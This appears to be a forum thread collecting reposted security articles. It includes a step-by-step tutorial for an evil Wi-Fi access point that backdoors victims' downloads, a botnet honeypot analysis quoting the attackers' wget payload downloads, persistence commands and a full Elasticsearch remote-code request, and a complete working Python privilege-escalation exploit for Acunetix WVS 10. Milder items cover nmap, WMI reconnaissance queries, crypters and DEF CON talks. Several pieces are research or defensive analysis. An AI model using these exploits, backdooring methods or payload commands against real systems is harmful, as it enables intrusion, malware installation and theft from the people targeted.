    EVIL ACCESS POINT WITH AUTO-BACKDOORING FTW! This post is about setting up an evil access point that will automatically backdoor executables that connected users download. Pretty neat, right? This tutorial is inspired by muts' NetHunter video of BDFProxy on NetHunter. I am using Kali NetHunter 2.0 running from a Nexus 9. I am using a TP-LINK TLWN722N (the 150Mbps version) as my secondary network interface. I recently purchased a Nexus 9 tablet and decided to load it up with Kali NetHunter. NetHunter is a release of Kali made specifically for hackers on-the-go. It’s packed with lots of cool stuff like one-click scripts, HID Keyboard attack capabilities plus a bunch of the tools that Kali desktop comes with. Tools A few tools I will be using: Mana – Rouge Access Point toolkit. It implements a more advanced version of the Karma attack. The most notable improvement is Mana responds to other AP broadcasts instead of device probes like Karma, but still with the end goal of tricking victims into connecting to the AP you own. Plus, it includes lots of other neat evil AP tricks that are baked right in. For more info on Mana I’d recommend watching the Defcon 22 talk where the tool was release here. BackdoorFactory BDFProxy – Automatically patches binaries with malicious payloads on the fly via MITM. False Start Since I want to also provide victims with Internet access so I can backdoor their downloads I will need another Wi-Fi interface on my Nexus 9. I ended up going with the TP-LINK TLWN722N because of its low power usage and its compatibility with Kali (supports packet injection). I launched the Kali NetHunter menu and saw a promising looking menu item: Kali NetHunter comes with Mana already installed and ready to go, or so I thought. Chances are I was doing something wrong, but I was not able to get the built-in one click launcher working out of the box. It even contained a screen for bdfproxy.cfg! When I started it there was even the option to start with bdf: But no dice. Even after correcting my upstream device from eth0 to wlan1 and double checking the dhcpd settings in the config file I couldn’t get the thing to run. I couldn't seem to find the output of either Mana or BDFProxy in the logs either. Setting Up So, off to the terminal! Home sweet home. I went into the Mana folder and skulked around a little bit: cd /usr/share/mana-toolkit/run-mana ls –lah Aha! The start-nat-simple-bdf-lollipop.sh looks promising. Let’s have a look: Everything looks pretty straightforward actually, which was pleasantly surprising. I never know what to expect with new tools. We assign some variables for devices, enable forwarding, start an access point and DHCP, monkey with the iptables and off we go. The only thing that stumped me at first was the “# Add fking rule to table 1006”. There are some config files mentioned in there. Let’s make sure they are set up properly. First stop is /etc/mana-toolkit/hostapd-karma.confg: Next let’s look at /etc/mana-toolkit/dhcpd.conf: Looks like we’re using Google for DNS and putting our clients on the 10.0.0.0/24 range. Cool beans. Let’s also take a look at the BDFProxy config file at /etc/bdfproxy/bdfproxy.cfg (config file below truncated to the important parts): Looks like there is something slightly off here. The IPs configured for our reverse shells (192.168.1.168 and 192.168.1.16) need to point back to us. According to our dhcpd.conf settings we're going to use the current settings aren't correct. We will be the router IP named in dhcpd.conf, so we need to change bdfproxy.cfg accordingly by setting all the HOSTs to point to us at 10.0.0.1. Quick replace with sed: sed –i 's/192.168.1.168/10.0.0.1/g' bdfproxy.cfg sed –I 's/192.168.1.16/10.0.0.1/g' bdfproxy.cfg The diffs: Starting up the Machine Ok, so it’s time to start Mana up: cd /usr/share/mana-toolkit/run-mana ./start-nat-simple-bdf-lollipop.sh In a new terminal we start BDFProxy up: cd /etc/bdfproxy/ ./bdfproxy Now that BDFProxy is up it has created a Metasploit resource file. It wasn’t entirely obvious at first where this file lived (it is not in /etc/bdfproxy/). It turns out the file is here: /usr/share/bdfproxy/bdfproxy_msf_resource.rc That resource file will help handle reverse shells. Time to open another terminal, navigate there and start up Metasploit: cd /usr/share/bdfproxy service postresql start cat bdf_msf_resource.rc #sanity check of conents, make sure IP update took msfconsole –r bdfproxy_msf_resource.rc After Metasploit is fired up we can see the resource file has loaded: Sweetness. Here is where I got stuck for a little bit. It appeared everything is set up and working properly. Mana was creating APs and I could connect and get back out to the internet. Iptables set up by Mana are correctly forwarding my traffic from port 80 to 8080 where BDFProxy is waiting. The problem is BDFProxy is failing to transparently proxy connections (mitmproxy underneath is actually failing). I got this error on all HTTP connections from my laptop test machine connected to the evil AP: HttpError('Invalid HTTP request form (expected: absolute, got: relative)',) It turns out I missed changing one of the default bdfproxy.cfg settings. The line transparentProxy = NoneNeeds to be changed to: transparentProxy = transparentAfter that BDFProxy was able to successfully backdoor executables. I connected to the AP with my laptop and download a file over http. I downloaded Audacity, and also tested with downloading Putty and PSFTP. Once BDFProxy gets its hooks in the backdoor is dropped in place: Here is the part that blew me away: executables within zips are backdoored, all done on the fly. How cool is that? For executable formats it not only works for Windows exe/PEs, but it does Linux ELF and Mach-O (that means you OSX!). Very cool stuff. - UPDATE 11/29/15: I've added some more content about BDFProxy in a new post here. 19 NOVEMBER 2015 Sursa: http://decidedlygray.com/2015/11/19/evil-access-point-with-auto-backdooring-ftw/
  15. Nytro
    The most dangerous function in the C/C++ world 03.12.2015Andrey Karpov Couple of words about me New observation. Examples Conclusion After checking hundreds of various C/C++ projects I can claim: memset() is the most inefficient and dangerous function. Most errors that I see in the projects are related to the usage of this particular memset() function. I understand that my conclusion is probably neither a revolutional one, nor an extremely useful one, but I think our readers would be interested to find out why I have come to it. Couple of words about me My name is Andrey Karpov. I do a lot of things in my life. But the main thing what I do is tell the programmers about the benefits of using static code analysis. Of course I do it pursuing an additional goal - I try to raise interest in PVS-Studio. However, this should not lessen the usefulness of my articles. The only form of advertising that can pierce through the armor of programmers' skepticism is the demonstration of the bugs that were found by PVS-Studio. For this purpose I run the analyzer on a big number of projects and write articles about the check results. This brings common benefits. Open-source projects are gradually getting better, and our company is obtaining new customers. You'll see what I'm leaning to. Doing numerous checks of open-source projects, I have gathered a pretty big collection of various bug examples. And now, based on it, I see interesting error patterns. For example, one of the most amusing observations was that most often programmers make mistakes using Copy-Paste at the very end. On this topic there is an article "The Last Line Effect" for those who may be interested. New observation. Now I have another interesting observation. Using one or another function, the programmers can make mistakes. That is clear, you may say. But the probability of the error may also depend on the function. In other words, some functions provoke errors, and some don't. And now I am ready to name the function which causes most of the troubles and using which you have the biggest chance of an epic fail. So, the biggest looser among the functions is the memset function! It's hard to say where is the root of this evil. Apparently it has an unfortunate interface. On top of it, its very usage is quite toilful and it's very easy to get wrong, evaluating values of the actual arguments. The second "Biggest looser" award goes to the printf() function and its variants. I guess it's no surprise. Only lazy people won't write about the danger of the printf() function. Probably the popularity of the issues related to the printf() functions brought it to the second place. All in all there are 9055 bugs in my storage. These are errors that PVS-Studio is able to detect. It is clear that this list is far being a complete one. However, such a large number of bugs allows me to be confident, making such statements about the functions. So, I figured that 329 errors are caused by the memset() function. In sum total, about 3,6% of bugs are related to this function! That's a lot, I should say. Articol complet: http://www.viva64.com/en/b/0360/
  16. Nytro
    ElasticZombie Botnet - Exploiting Elasticsearch Vulnerabilities [TABLE=class: blogpost-byline, width: 621] [TR] [TD=class: blog-author]Markus Manzke December 2, 2015[/TD] [TD=class: blog-social][/TD] [/TR] [/TABLE] With the rise of inexpensive Virtual Servers and popular services that install insecurely by default, coupled with some juicy vulnerabilities (read: RCE - Remote Code Execution), like CVE-2015-5377 andCVE-2015-1427, this year will be an interesting one for Elasticsearch. Elasticsearch provides plenty of targets for people to exploit and create server-based botnets but in fairness it is not only Elasticsearch that suffers from critical vulnerabilities there is also ShellShock, mongodb-exploits and very recently a bug that hit WebSphere, JBoss, Jenkins and OpenNMS. This blog post analyzes what happens if you run a vulnerable service that is connected to the internet resulting in your server becoming a compliant member of a botnet. With our analysis we concentrate on how the infection happens, what the bots are doing and whom they communicate with, but not the code itself. For a nice read on dissecting Linux-based malware we'd suggest you read the articles from @MalwareMustDie. Over a period of 3-months we collected more than 30 different bots, giving us enough interesting stuff to play with and analyze. Exploits against ElasticZombie - Honeypots, 30 days Setup This past summer we rolled out some honeypots, designed to simulate Elasticsearch installations that are vulnerable to the latest RCE vulnerabilities, which enabled us to track and record each phase of an exploit and catch the malware to analyze what it does when executed. The Honeypots themselves consisted of a real Elasticsearch server, and we used nginx and lua to detect and record the exploits in GET or POST requests. This allowed us to correlate and track activities, as well as bad actors across all of our honeypots. In the next blog post, we will provide details of the botnet-infrastructure. Within 3-4 days after setup, the first scanners hit some Shodan-scanners and vuln-crawlers from organizations and universities, but also from IPs with no PRT.. A few days after setup we saw the first exploit attempts that allowed ups to fine-tune our setup. Categorizing the Bots The Bots we collected were ELF-executables, mostly 32-bit-binaries that wouldn’t run on a pure x64-server, but also some 64bit-versions, in opposite the perl-bots Conor Patrick caught this also with a ShellShock-Honeypot some weeks ago. Half of the 30+ bots we collected didn’t run; the remaining 15 bots could be classified into 2 different categories: fBots: Fire & Forget - DDoS-Bots (most of them) that just execute without further installation iBots: more sophisticated bots who install themselves in /etc or /var that can download more modules/bots and delete the original file The fBots are well known and nothing new and are sometimes referred to as BillGates/BillGates.lite: xwdl/xoxo - VT - 26 / 57 udp/syn2500 VT - 27 / 56 ssss/508 VT - 12 / 56 iBots, also referred to as IptabLex/IptabLes, have been around for quite some time and were wellanalyzed in May 2014 and again in June 2015 by MalwareMustDie. yf2: VT - 21 / 56 -rwxr-x--- 1 bware bware 1315556 Nov 22 11:13 68089 -rwxr-x--- 1 bware bware 1312420 Nov 23 08:43 508 -rwxr-x--- 1 bware bware 1312292 Aug 13 02:36 ssss -rwxr-x--- 1 bware bware 1223123 Nov 22 11:35 04 -rwxr-x--- 1 bware bware 1223123 Sep 15 08:02 syn25000 -rwxr-x--- 1 bware bware 1223123 Sep 17 13:09 udp -rwxr-x--- 1 bware bware 1223123 Dez 2 2014 vpcinull -rwxr-x--- 1 bware bware 1128800 Nov 20 13:58 xdg1 -rwxr-x--- 1 bware bware 1128800 Okt 6 13:33 xdwl -rwxr-x--- 1 bware bware 1128800 Dez 13 2013 xoxo -rwxr-x--- 1 bware bware 841596 Nov 24 08:10 libvent -rwxr-x--- 1 bware bware 727556 Okt 7 08:24 yf2 -rwxr-x--- 1 bware bware 87600 Nov 23 17:56 TcT What we observed among all the bots is that their DNS names for C&C-servers, ports and fallbacks were obfuscated and are not available in plaintext when extracting the strings from the executables. Interestingly, Akamai released an analysis on XORDDoS-Botnets, performing DDoS-attacks, and it could be the case that the bots we collected are hiding such interesting information, but we did not analyze the code of the bots further, so we cannot say for sure. Stage 1: Scan & Exploit! Coming from stage 0 (scans that are merely just GET / - requests) there is a simple way for an attacker to land an exploit: just three requests and you are owned. The following shows one attack, stripped down to the commands executed (you'll find a full exploit in the Appendix below): -- download the bots 00:46:39 [alert] request: wget -O /tmp/yf1 http://114.215.149.148/yf1 00:46:40 [alert] request: wget -O /tmp/yf2 http://114.215.149.148/yf2 -- hours later ... executing the bot 05:03:21 [alert] request: chmod 777 /tmp/* 05:03:22 [alert] request: chmod 777 /tmp/yf2 & 05:03:22 [alert] request: chmod 777 /tmp/yf1 & 05:03:23 [alert] request: /tmp/yf2 & 05:03:23 [alert] request: nohup /tmp/yf2 > /dev/null 2>&1 05:03:24 [alert] request: /tmp/yf1 & 05:03:24 [alert] request: nohup /tmp/yf1 > /dev/null 2>&1 -- making changes persistent to start the bot upon next -- reboot and shutdown the firewall 05:03:25 [alert] request: echo \"cd /tmp/\">>/etc/rc.local 05:03:25 [alert] request: echo \"/tmp/yf2\">>/etc/rc.local 05:03:26 [alert] request: echo \"/etc/init.d/iptables stop\">>/etc/rc.local 05:03:26 [alert] request: echo \"/tmp/yf1\">>/etc/rc.local 05:03:27 [alert] request: echo \"/etc/init.d/iptables stop\">>/etc/rc.local At this point if you had a vulnerable ElasticSearch instance running you'd be considered hacked, and if you ran it as Root the infection would be persistent and survive a reboot. Stage 2 : Calling Home After execution, the bots request the IP of their current C&C master. Most bots we've seen are using a DNS-name to get the IP, while we also observed some bots using included IPs, especially when no DNS-servers could be reached. Bot communication - getting the IP of the current C&C After getting the current IP, some traffic from the bot could be observed, including an identifier and some information about the system the bot runs on, reporting "On duty, Sire!" -- some identifiers, send by bots to their masters -==Healer==- Linux 3.16.0-0.bpo.4-amd64 2.40 -==ruirui ==- Linux 3.16.0-0.bpo.4-amd64 2.40 Linux 3.16.0-0.bpo.4-amd64 root 4*2494MHZ 3688MB 0M 172.17.0.104 Bot-Communication, reporting into the botnet After reporting itself "ready" the bots pings the master every 5 seconds, waiting for commands and targets to attack, while transmitting its own status every 30 seconds. Bot-Communication, keep-alive-pings and status-reports One variant (ssss) of those fBots occasionally requested and downloaded a file (amp.dat) from the server it initially got the bot from (http://111.74.239.61:8080/ntp.txt ); the latest version of this file consited of 14000+ IPs; it might be a list of servers that might be misused for amplification/reflection-attacks. We're not yet done checking all the IPs, but will deliver this analysis later in a a future blog post. Stage 3: Attack! When the C&C master promotes a new target, it's sent over to the client with a single package and the show begins: Bot-Communication, getting target-IP and attack-start What we've seen among all fBots: once the boss receives a target-IP it immediately fires just traffic (SYN-flood) onto a given port, either HTTP, MYSQL or otherrandom ports. The bots fire on max-speed, so any traffic originating from an infected server should easily be detected if the dc-operator enforces thresholds or monitors outgoing traffic. You definitely will see spikes. Some notes on infection-workflow and botnet-infrastructure A closer look on the operation of the whole botnet-infrastructure revealed an interesting workflow that functions as follows: Scanners crawl the internet, searching for vulnerable Elasticsearch-installations; once they find one they start to execute an exploit The exploit downloads a bot from different server that hosts various bots and files After download, the scanning-server executes the bot on vulnerable installations If the bot runs, it requests the IP for the C&C-master or uses a hardcoded IP and reports itself as ready, waiting for commands Upon receiving the attack-command and the IP of a target, the attacks start Thus we see a distributed infrastructure, controlled by the botmasters to create and operate botnets. In a follow-up blog we'll take a closer look on the botnet-infrastructure itself, and analyze it more deeply. The OTX pulses we created are: ElasticSearch-Botnet C&C-Master DNS-Names ElasticSearch-Botnet C&C-Master IPs ElasticSearch Botnet - Botware Download URLs Footnotes it will be exploited, the question is not IF, but WHEN; scanners are scanning, 24/7 References Shodan: It's the Data, Stupid! A few things about Redis security Elasticsearch CVE-2015-5377 What Do WebLogic, WebSphere, JBoss, Jenkins, OpenNMS, and Your Application Have in Common? This Vulnerability MongoDB 2.2.3 - nativeHelper.apply Remote Code Execution MMD-0025-2014 - ITW Infection of ELF .IptabLex & .IptabLes China #DDoS bots malware A close look at an operating botnet MMD-0035-2015 - .IptabLex or .IptabLes on shellshock.. sponsored by ChinaZ actor Akamai: Threat Advisory: XOR DDoS Appendix Full exploit-code, as seen by our honeypots request: "GET /_search?source={"query": {"filtered": {"query": {"match_all": {}}}}, "script_fields": {"exp": {"script": "import java.util.*;import java.io.*;String str = \"\";BufferedReader br = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(\"wget -O /tmp/yf2 http://111.222.333.444/yf2\").getInputStream()));StringBuilder sb = new StringBuilder();while((str=br.readLine())!=null){sb.append(str);sb.append(\"\r\n\");}sb.toString();"}}, "size": 1} HTTP/1.1", host: "my.boy.lollipop:9200"Domains queried to get C&C - IPs -- fBots www.zhimingge.in yy.zhimingge.in www.3xdk.com fk.appledoesnt.com www.3xdk.com-- iBots 00120012.3322.orgList of servers that hosts various versions of bots (bot-providers) http://111.74.239.61:8080/ssss http://111.74.239.61:8080/ntp.txt ? ntp-servers http://198.15.216.27:2015/xdg1 http://111.74.239.61:8080/68089 http://111.74.239.61:8080/04 http://61.160.221.139:8000/xoxo http://222.186.30.247:8080/udp http://222.186.34.177:5656/vpcinull http://222.186.31.248:53/libvent http://114.215.149.148/yf2 current C&C-IPs from the bots we executed and analyzed 23.234.50.12 61.160.194.62 61.160.221.139 103.105.144.172 108.171.252.20 113.105.144.172 183.60.202.75 222.186.15.92 222.186.30.247 222.186.34.177 222.186.21.106 222.186.190.233 222.186.56.15 About the Author Bio: Markus Manzke is a Security Analyst with a German partner of AlienVault's, 8ack. Please follow 8ack on Twitter. Sursa: https://www.alienvault.com/open-threat-exchange/blog/elasticzombie-botnet-exploiting-elasticsearch-vulnerabilities
  17. Nytro
    Port Scanning 101 Author - Natalia Wadden Matrix Reloaded, Bourne Ultimatium and a brief glimpse in Girl with the Dragon Tattoo – these are just a few movies which feature a port scanning technique called nmap. Before we go to far, let’s define nmap. It sounds glamorous, it must be, it is featured in at least 3 major Hollywood films. Nmap aka Network Mapper is a security scanner that is used to detect hosts and services on a computer network – in short it can determine which ports are open, what the operating system (OS) and version is, services that are offered, and what firewalls are used – basically it can create a map of the computer network and hosts. Nmap is portable, it can be used across multiple platforms, Windows, Mac and Linux, but it is most commonly used in Linux. For this article, I will be using Kali Linux, it’s easy and many tools are already built into the OS. My mentor described ports as windows in a building, which means that nmap is looking for the open windows aka ports. So let’s dive in and scan our test machine and see if we can find any open ports. Our simple nmap scan provided us with a significant amount of information, this can be over whelming if you don’t know what to look for – let’s try to break it down. Nmap has shown us that each of these ports are open via the 3 way TCP handshake. A SYN was sent to an open port, in the case above port 80 (web) and responded with a SYN ACK, the client answered SYN ACK with an ACK, thereby completing the response. An open port 80 is not uncommon, many websites have this open as they require it as part of their business, for example, Amazon, Ebay and Google, all have port 80 open, if they weren’t open nobody could see their website. Now let’s try this again but use a UDP (User Datagram Protocol) scan along with nmap, and see what happens. UDP scan does not require the 3 way handshake, which means a request will be sent out, but a response is not necessairly received, there is no guarentee of delivery. UDP is typically used for streaming audio media and real-time video as it is designed to handle occasional lost packets, so only slight degradation in quality occurs, rather than large delays if lost packets were retransmitted. The results of our UDP nmap scan above provides us with a datagram of possible vulnernabilities, ports which if we were curious could continue investigating, such as Port 53, Port 69 , Port 137 and Port 2049 – if we listen to these ports, we potentially might be pleasantly surprised with what we find. Let’s do one more, let’s see if we can find out what versions are running on each port. Let’s try another one, this time, this time, type in nmap man, this will bring up the nmap manual. In our next example, let’s try a built-in shorthand for the most popular options "-A". This type of scan provides additional information about the remote system to the ports provided by a typical nmap scan. Take a close look at the results of our scan - With a simple command, we have now discovered the OS version, the various hosts as well as the version of Tomcat. Nmap is used by many individuals, and not all of them are “bad”, some are malicious individuals looking to sniff around networks looking for open ports, to get information, others are security professionals, using nmaping to conduct penetration testing to safely exploit system vulnerabilities to evalute the security. Sursa: http://www.adeptus-mechanicus.com/codex/contrib/nw-ps101/nw-ps101.php
  18. Nytro
    [h=3]Thoughts on Exploiting a Remote WMI Query Vulnerability[/h] On December 1, 2015, a really interesting vulnerability was disclosed in the Dell Foundation Services software. If installed, a SOAP service will listen on port 7779 and grant an attacker the ability to execute unauthenticated WMI queries. I can’t say I’ve ever encountered such a vulnerability class so this posed an interesting thought exercise into how an attacker might effectively exploit such a vulnerability beyond just using the queries to conduct host recon. Specifically, this vulnerability only allows an attacker to query WMI object instances within the default namespace – ROOT/CIMv2. This means that you cannot invoke WMI methods or perform event registration - i.e. this is not a remote code execution vulnerability. I released a PoC PowerShell exploit that allows you to easily view and parse WMI query output from a vulnerable host. The script could be used to test the exploit locally assuming you have a Dell computer to test on. The vulnerable software can be obtained from Dell. Specifically, the vulnerable function is contained withinDell.Tribbles.Agent.Plugins.SystemInfo.dll. So what kinds of things could an attacker do that would give them the greatest bang for their buck? For starters, let’s say you wanted to list all available classes within the ROOT/CIMv2 namespace as a means of determining the attack surface? PS C:\> Get-DellFoundationServicesWmiObject -IPAddress 127.0.0.1 -Query 'SELECT * FROM Meta_Class' What you will find is that there is a sea of WMI classes. We’ll need to find the diamonds in the rough. Here is an extremely non-comprehensive list of what I came up with in conjunction with Sean Metcalf and Carlos Perez: File listing for a specific directory. e.g. C:\ or search by extension SELECT * FROM CIM_DataFile WHERE Drive="C:" AND Path="\\" SELECT * FROM CIM_DataFile WHERE Extension="xlsx" Process listing (including command-line invocation which could possibly include credentials) SELECT * FROM Win32_Process List all services SELECT * FROM Win32_Service Account/group enumeration SELECT * FROM Win32_Account SELECT * FROM Win32_UserAccount SELECT * FROM Win32_Group SELECT * FROM Win32_LoggedOnUser List startup programs present in the registry and Start Menu SELECT * FROM Win32_StartupCommand OS/Hardware info SELECT * FROM Win32_BIOS SELECT * FROM Win32_ComputerSystem # Uptime, logged-in user, etc. SELECT * FROM Win32_OperatingSystem Hard disk enumeration SELECT * FROM Win32_DiskDrive SELECT * FROM Win32_DiskPartition SELECT * FROM Win32_LogicalDisk SELECT * FROM Win32_Volume SELECT * FROM Win32_MountPoint List system environment variables SELECT * FROM Win32_Environment List network devices and configurations SELECT * FROM Win32_NetworkAdapter SELECT * FROM Win32_NetworkAdapterConfiguration # Shows assigned IPs List mapped shares SELECT * FROM Win32_Share Obviously, there are a ton of classes that I may be missing that you may find to be useful but these were the ones that stood out to me. Now, beyond performing simple recon actions, what other WMI queries might be impactful, enable leaks of extremely sensitive information, enable further exploitation, or cause system instability? Here are some queries I came up with: Ping sweep. This could be used to conduct basic internal scanning. SELECT * FROM Win32_PingStatus WHERE Address="10.10.0.1" Potentially screw with MSI configurations. SELECT * FROM Win32_Product List installed patches. i.e. See determine which patches are not installed. SELECT * FROM Win32_QuickFixEngineering Dump event logs. e.g. dump System log. This is the most sensitive info leak I can think of. SELECT * FROM Win32_NtLogEvent WHERE Logfile="System" If you can think of any additional classes that would go above and beyond host recon, please let me know on Twitter! Sursa: http://www.exploit-monday.com/2015/12/thoughts-on-exploiting-remote-wmi-query.html
  19. Nytro
    Malware Crypters – the Deceptive First Layer DECEMBER 2, 2015 | BY HASHEREZADE Recently, two suspects were arrested for selling Cryptex Reborn and other FUD tools (helping to install malware in a Fully UnDetectable way). Today, we will study some examples to make sure that everyone knows what this type of tools are and why they are dangerous. We will also present some example of identifying and unpacking a malware crypter. Crypters – what are they? Most modern malware samples, in addition to built-in defensive techniques, are protected by some packer or crypter. A crypter’s role is basically to be the first – and most complex – layer of defense for the malicious core. They try to deceive pattern-based or even behavior-based detection engines – often slowing down the analysis process by masquerading as a harmless program then unpacking/decrypting their malicious payload. They may also add some icons and metadata that make the sample look like a legitimate product. Underground crypters, created to defend malware against antivirus/anti-malware products, are sold in typical cybercriminal hangouts. Below, you can see examples of crypters being advertised on the black market and the tricks they use: Articol complet: https://blog.malwarebytes.org/development/2015/12/malware-crypters-the-deceptive-first-layer/
  20. Nytro
    [h=1]DEF CON 23 - Vehicle Hacking Village - Eric Evenchick - SocketCAN[/h] Exploration of what SocketCAN is, how it works and how it can be used to create CANBUS applications.
  21. Nytro
    DEF CON 23 - Vehicle Hacking Village - Nathan Hoch - The Badge and PAWN: Customizing the Badge Overview of how to modify the badge for the game at Vehicle Hacking Village.
  22. Nytro
    DEF CON 23 - Samy Kamkar - Drive it like you Hacked it: New Attacks and Tools to Wireles Gary Numan said it best. Cars. They’re everywhere. You can hardly drive down a busy freeway without seeing one. But what about their security? In this talk I’ll reveal new research and real attacks in the area of wirelessly controlled gates, garages, and cars. Many cars are now controlled from mobile devices over GSM, while even more can be unlocked and ignitions started from wireless keyfobs over RF. All of these are subject to attack with low-cost tools (such as RTL-SDR, GNU Radio, HackRF, Arduino, and even a Mattel toy). We will investigate how these features work, and of course, how they can be exploited. I will be releasing new tools and vulnerabilities in this area, such as key-space reduction attacks on fixed-codes, advanced "code grabbers" using RF attacks on encrypted and rolling codes, and how to protect yourself against such issues. By the end of this talk you’ll understand not only how vehicles and the wirelessly-controlled physical access protecting them can be exploited, but also learn about various tools for car and RF research, as well as how to use and build your own inexpensive devices for such investigation. Ladies and gentlemen, start your engines. And other people’s engines. Samy Kamkar is a security researcher, best known for creating The MySpace Worm, one of the fastest spreading viruses of all time. He (attempts to) illustrate terrifying vulnerabilities with playfulness, and his exploits have been branded: “Controversial”, -The Wall Street Journal “Horrific”, -The New York Times “Now I want to fill my USB ports up with cement”, -Gizmodo He’s demonstrated usurping typical hardware for surreptitious means such as with KeySweeper, turning a standard USB wall charger into a covert, wireless keyboard sniffer, and SkyJack, a custom drone which takes over any other nearby drones allowing them to be controlled as a massive zombie swarm. He’s exposed issues around privacy, such as by developing the Evercookie which appeared in a top-secret NSA document revealed by Edward Snowden, exemplifying techniques used by governments and corporations for clandestine web tracking, and has discovered and released research around the illicit GPS and location tracking performed by Apple, Google and Microsoft mobile devices. He continues to produce new research and tools for the public as open source and open hardware. Twitter: @samykamkar
  23. Nytro
    DEF CON 23 - Marc Rogers and Kevin Mahaffey - How to Hack a Tesla Model S The Tesla Model S is the most connected car in the world. It might surprise you to hear that it is also one of the most secure. In this talk we will walk you through the architecture of a Tesla Model S noting things that Tesla got right as well as identifying those that they got wrong. From this talk you will get an intimate understanding of how the many interconnected systems in a Tesla model S work and most importantly how they can be hacked. You will also get a good understanding of the data that this connected car collects and what Tesla does with this telemetry. We will also be releasing a tool that will enable Tesla Model S owners to view and analyse that telemetry in real time. Finally we will also be releasing several 0day vulnerabilities that will allow you to hack a Tesla Model S yourself - both locally and remotely. Note - only one of the 6 vulnerabilities we will discuss and release has been fixed. Disclaimer: With great access comes great responsibility - In other words we are not responsible for any Tesla Model S bricked by over enthusiastic attendees of this talk Speaker Bios: Marc Rogers aka Cyberjunky has been a prominent member of the hacking scene since the 80’s. Some of his most notable achievements are co-founding the notorious British hacker group, “The Agents of a Hostile Power” and his role in creating and appearing in the award winning BBC TV series “The Real Hustle”. Marc’s professional career spans more than twenty years, including a decade managing security for the UK operator Vodafone. Marc is currently the principal security researcher for web optimization and security company “CloudFlare. As well as his work in the infosec and telecoms industries, Marc has also been a CISO in South Korea and co-founder of a disruptive Bay Area start-up. Some of Marc’s notable recent hacks include Google Glass, Apple TouchID and most recently the Tesla Model S. Kevin is an entrepreneur and technologist with a background in mobile and web technology, security, and privacy. He is the CTO of Lookout, a company dedicated making the world a safer place as it becomes more connected, starting with smartphones and tablets. He co-founded Lookout in 2007 and is responsible for driving Lookout’s technology to protect people from current and future threats while keeping the product simple and easy to use. He started building software when he was 8 years old and it has been a love affair ever since. Kevin is a frequent speaker on security, privacy, mobile, and other topics.
  24. Nytro
    [h=1]Acunetix WVS 10 - Local Privilege escalation[/h] ''' ======================================================================== Acunetix WVS 10 - from guest to Sytem (Local privilege escalation) CVE: CVE-2015-4027 Author: (me) Daniele Linguaglossa Affected Product: Acunetix WVS 10 Exploit: Local privilege escalation Vendor: Acunetix ltd Remote: No Version: 10 ========================================================================= A local privilege escalation exists in Acunetix WVS 10, it allow a local user (even guest) to gain same privilege as System user. With default Acunetix installation, a service called "AcuWVSSchedulerv10" will be installed, this service run as local system user. AcuWVSSchedulerv10 is reponsable for scan scheduling without user interaction it expose some API to interact via a web server usually localhost:8183. API: /listScan /addScan <== vulnerable one /deleteScan etc... When a user schedule a scan API "addScan" will be called as following ------------------------------------------------------------------------------- POST /api/addScan HTTP/1.1 Host: localhost:8183 User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:42.0) Gecko/20100101 Firefox/42.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/json; charset=UTF-8 RequestValidated: true X-Requested-With: XMLHttpRequest Referer: http://localhost:8183/ Content-Length: 452 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache { "scanType": "scan", "targetList": "", "target": ["http://.target.it"], "recurse": "-1", "date": "12/2/2015", "dayOfWeek": "1", "dayOfMonth": "1", "time": "12:21", "deleteAfterCompletion": "False", "params": { "profile": "Default", "loginSeq": "<none>", "settings": "Default", "scanningmode": "heuristic", "excludedhours": "<none>", "savetodatabase": "True", "savelogs": "False", "generatereport": "False", "reportformat": "PDF", "reporttemplate": "WVSAffectedItemsReport.rep", "emailaddress": "" } } ------------------------------------------------------------------------------ The first thing i noticed was the reporttemplate, this was used to create report when scanning ends, so it means an external file wich we can control will be then used by System! this would be interesting enough but i never look deep into. Instead i noticed something even worst, filename was used as argument to wvs.exe called with system privilege! By looking at how Acunetix handled reporttemplate argument i figured out that was possibile to inject custom arguments within reporttemplate, now this is where Acunetix help us in fact wvs was provided with an interesting argument it was /Run as reference says: https://www.acunetix.com/blog/docs/acunetix-wvs-cli-operation/ Run a command line command during the crawl. Syntax: /Run [command] Example: /Run curl http://example.com/dir1/ Wow that's really nice, so in order to execute a command we must insert a fake Crawl followed by a Run command so reporttemplate become: "reporttemplate": "WVSAffectedItemsReport.rep /Craw http://fakesite.it /Run cmd.exe" it worked cmd runned as System! ================================================================================== Now let's pwn this! escalation.py ''' import httplib import json from datetime import datetime import sys from time import gmtime, strftime COMMAND = sys.argv[1] if len(sys.argv) > 1 else "cmd.exe" ACUHOST = '127.0.0.1' ACUPORT = 8183 ACUHEADERS = { "Content-Type": "application/json; charset=UTF-8", "X-Requested-With": "XMLHttpRequest", "Accept": "application/json, text/javascript, */*; q=0.01", "RequestValidated": "true" } ACUEXPLOIT = "/Crawl http://www.google.it /Run \""+ COMMAND + "\"" ACUDATA = {"scanType":"scan", "targetList":"", "target":["http://"+"A"*2048], "recurse":"-1", "date":strftime("%m/%d/%Y", gmtime()), "dayOfWeek":"1", "dayOfMonth":"1", "time": "%s:%s" % (datetime.now().hour, datetime.now().minute+1), "deleteAfterCompletion":"False", "params":{"profile":"Default", "loginSeq":"<none>", "settings":"Default", "scanningmode":"heuristic", "excludedhours":"<none>", "savetodatabase":"True", "savelogs":"False", "generatereport":"False", "reportformat":"PDF", "reporttemplate":"WVSDeveloperReport.rep " + ACUEXPLOIT, "emailaddress":""} } def sendExploit(): conn = httplib.HTTPConnection(ACUHOST, ACUPORT) conn.request("POST", "/api/addScan", json.dumps(ACUDATA), ACUHEADERS) resp = conn.getresponse() return "%s %s" % (resp.status, resp.reason) print "Acunetix Wvs 10 Local priviledge escalation by Daniele Linguaglossa\n" print "[+] Command : %s will be executed as SYSTEM" % COMMAND print "[+] Sending exploit..." print "[+] Result: "+sendExploit() print "[+] Done!" ''' ============================================================================ I hope this write-up was funny enough anyway i really would like to thank Acunetix product manager N.S. for the really fast answer and bug mitigation, right now a patch exists so hurry up download it now. ============================================================================ ''' Sursa: https://www.exploit-db.com/exploits/38847/
  25. Nytro
